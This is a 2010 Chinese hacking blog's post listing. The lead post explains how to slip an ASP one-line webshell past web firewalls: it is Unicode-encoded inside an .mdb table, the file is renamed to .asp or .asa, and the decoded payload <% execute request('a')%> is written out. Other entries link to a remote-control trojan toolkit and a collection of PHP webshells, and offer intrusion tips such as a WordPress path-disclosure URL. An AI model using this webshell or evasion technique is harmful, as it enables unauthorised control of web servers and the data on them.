现在有不少服务器加了web的防火墙,用来过滤含asp/jsp/php的网马代码,全部用空格替换,
比较讨厌,不过后来刚好想到以前的一句话时候的unicode编码,那就也搞一个吧。
1.新建一个mdb
2.建表,考入:┼攠數畣整爠煥敵瑳∨≡┩> nbsp;
(实际是<% execute request(“a”)%>)
3.改后缀为asp/asa
...黑面小窝
欢迎光临小窝,有任何问题请留言反馈。QQ:3768110 本站使用全屏模板,导致你访问框架变形的敬请谅解~
2010年9月2日
通过unicode躲开web防火墙过滤,webshell上传全是空格问题
Tags: web安全 黑客
发布:admin | 分类:技术文章 | 评论:1 | 引用:0 | 浏览:
2010年7月26日
2010年黑客X档案 黑客防线 电子书真正PDF版下载(以更新到6月)
转自黑客笔记
2010年黑客X档案 非安全黑客手册 黑客防线 月刊杂志电子书真正PDF版下载(无需密码)
本人自己提取出来的,提取方法是某大牛提供的,不能公开(公开了以后就没得玩了),本贴会持续更新
黑客X档案201001期PDF电子书.pdf
Tags: 黑客 书籍 学习
发布:admin | 分类:学习书籍 | 评论:0 | 引用:0 | 浏览:
2010年7月22日
国内黑客组织及国外安全焦点
纵观黑客发展史,大可分为三代:
第一代:专门从事计算机、网络,其代表组织为“绿色兵团”(1996年—1998年)
第二代:网络爱好者和在校学生.其代表组织为“中国黑客联盟”(1998年—2000年)
第三代:在校学生,其代表组织为“红客联盟”,“中国鹰派”(2000年—今)
Tags: 黑客 学习
发布:admin | 分类:学习书籍 | 评论:0 | 引用:0 | 浏览:
2010年7月19日
mickey:搞内网最常用的工具整理
http://www.edge-security.com/soft/wfuzz-1.4b-win.tar.gz
http://nmap.org/dist/nmap-5.00-win32.zip
Tags: 黑客 tool
发布:admin | 分类:常用工具 | 评论:0 | 引用:0 | 浏览:
2010年6月30日
黑客入侵教育网站 修改数据假证成真
据新华社电 济南市公安局近日成功侦破一起新型制售假证大案。令人吃惊的是,这伙犯罪分子采取黑客攻击手段,入侵国家级教育网站和多所高校网站,篡改数据后大肆制作和 销售假学历、假证书。由于在正规网站上能够查询到证书号,这些假证成为有备案的“真证书”。
济南破获制假大案
今年3月,济南市 公安局接到上级通报:1月8日,一个国家级教育网站的成绩查询系统出现异常,国家计算机二级和公共英语三级的考试数据成绩出现网上查询的成绩与实际考试结 果不符,部分不合格人员和未报名参加考试人员经查询显示为合格人员,部分涉嫌网上办理假学历的犯罪嫌疑人位于济南。
Tags: web安全 黑客
发布:admin | 分类:胡说乱写 | 评论:0 | 引用:0 | 浏览:
2010年6月19日
一个远控集合工具包
远控集合工具包 170M !
http://www.megaupload.com/?d=GN3V14OB
Tags: tool 黑客
发布:admin | 分类:常用工具 | 评论:0 | 引用:0 | 浏览:
2010年6月3日
35个国外PHP网页木马
来自T00LS的魔武千年同学的整理分享
国内站用PHPspy就足矣,但针对国外的站,国产shell往往无法实现某些功能,
这时就得用国外的shell了。以下shell为本人精心整理,每个shell单独一个文件夹,
并附有图片方便大家预览,由于是在国外下载的资源,安全性不能确定,还麻烦前辈们帮忙检测下。
Tags: php 黑客
发布:admin | 分类:漏洞收集 | 评论:0 | 引用:0 | 浏览:
2010年5月27日
渗透技巧总结--方便查询
我把自己平常做渗透时需要的东西记录在此,方便自己查询,也方便有需要的人,此日志不断更新,如果你有小技巧或方法,可以留言或短信分享。
by:0x14
信息收集
敏感端口:
1158/em/console/logon/logon
5560/isqlplus/workspace.uix
WordPress的平台,爆绝对路径的方法是:
url/wp-content/plugins/akismet/akismet.php
Tags: 黑客
发布:admin | 分类:技术文章 | 评论:0 | 引用:0 | 浏览:
2010年5月17日
个人渗透的一般流程总结
Author:Tsingx
写在前面,
本文没有图,纯理论上做总结,2k字左右,不多,大家耐心点
入侵存在运气的几率,我们只有不断的提高自己,才能够将运气的成分将到最小;
方法是死的,人是活的,思路更是活的。
Tags: web安全 黑客
发布:admin | 分类:技术文章 | 评论:0 | 引用:0 | 浏览:
2010年5月12日
作为尚未入门的新手,该学习什么?
因为见到很多新手在问,想要入门该学习什么,所以,整理了这样一篇文章
在此,我需要声明的是,本篇文章只是依据个人的经验而写,如果你不认同,请你走开,谢谢合作
=== 正文 ===
1. 入门推荐
从第一次见到有人问类似的问题,我就一直坚持着我的回答
